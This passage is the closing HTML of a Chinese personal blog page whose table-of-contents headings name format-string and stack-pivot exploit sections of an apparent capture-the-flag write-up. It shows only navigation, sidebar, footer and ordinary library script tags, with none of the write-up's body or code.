          返回地址确定</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%90%BD%E5%88%B0menu%E5%87%BD%E6%95%B0%E4%B8%AD%E7%9A%84printf"><span class="toc-number">1.2.2.1.</span> <span class="toc-text">
          落到menu函数中的printf</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%90%BD%E5%88%B0getinfo%E4%B8%AD%E7%9A%84printf"><span class="toc-number">1.2.2.2.</span> <span class="toc-text">
          落到getinfo中的printf</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E5%81%8F%E7%A7%BB%E7%9A%84%E7%A1%AE%E5%AE%9A"><span class="toc-number">1.2.3.</span> <span class="toc-text">
          格式化字符串偏移的确定</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#exp-1"><span class="toc-number">1.2.4.</span> <span class="toc-text">
          exp</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%A0%88%E8%BF%81%E7%A7%BBexp"><span class="toc-number">1.2.5.</span> <span class="toc-text">
          栈迁移exp</span></a></li></ol></li></ol></li></ol></section><!-- ov = overview--><section class="sidebar-ov hide"><div class="sidebar-ov-author"><div class="sidebar-ov-author__avatar"><img class="sidebar-ov-author__avatar_img" src="/images/icons/aa.png" alt="avatar"></div><p class="sidebar-ov-author__text">n3gative25</p></div><div class="sidebar-ov-social"><a class="sidebar-ov-social-item" href="/images/qq.jpg" target="_blank" rel="noopener" data-popover="QQ" data-popover-pos="up"><span class="sidebar-ov-social-item__icon"><i class="fab fa-qq"></i></span></a></div><div class="sidebar-ov-state"><a class="sidebar-ov-state-item sidebar-ov-state-item--posts" href="/archives/"><div class="sidebar-ov-state-item__count">2</div><div class="sidebar-ov-state-item__name">Archives</div></a><a class="sidebar-ov-state-item sidebar-ov-state-item--categories" href="/categories/"><div class="sidebar-ov-state-item__count">0</div><div class="sidebar-ov-state-item__name">Categories</div></a></div></section><div class="sidebar-reading"><div class="sidebar-reading-info"><span class="sidebar-reading-info__text">You have read </span><span class="sidebar-reading-info__num">0</span><span class="sidebar-reading-info__perc">%</span></div><div class="sidebar-reading-line"></div></div></aside></div><div class="clearfix"></div></div></main><footer class="footer" id="footer"><div class="footer-inner"><div>寻找属于自己的25号底片</div></div></footer><div class="loading-bar" id="loading-bar"><div class="loading-bar__progress"></div></div><div class="back2top" id="back2top"><span class="back2top__icon"><i class="fas fa-rocket"></i></span></div></div><script src="https://cdn.jsdelivr.net/npm/jquery@v3.4.1/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@1.5.2/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@1.5.2/velocity.ui.min.js"></script><script src="/js/utils.js?v=2.8.0"></script><script src="/js/stun-boot.js?v=2.8.0"></script><script src="/js/scroll.js?v=2.8.0"></script><script src="/js/header.js?v=2.8.0"></script><script src="/js/sidebar.js?v=2.8.0"></script></body></html>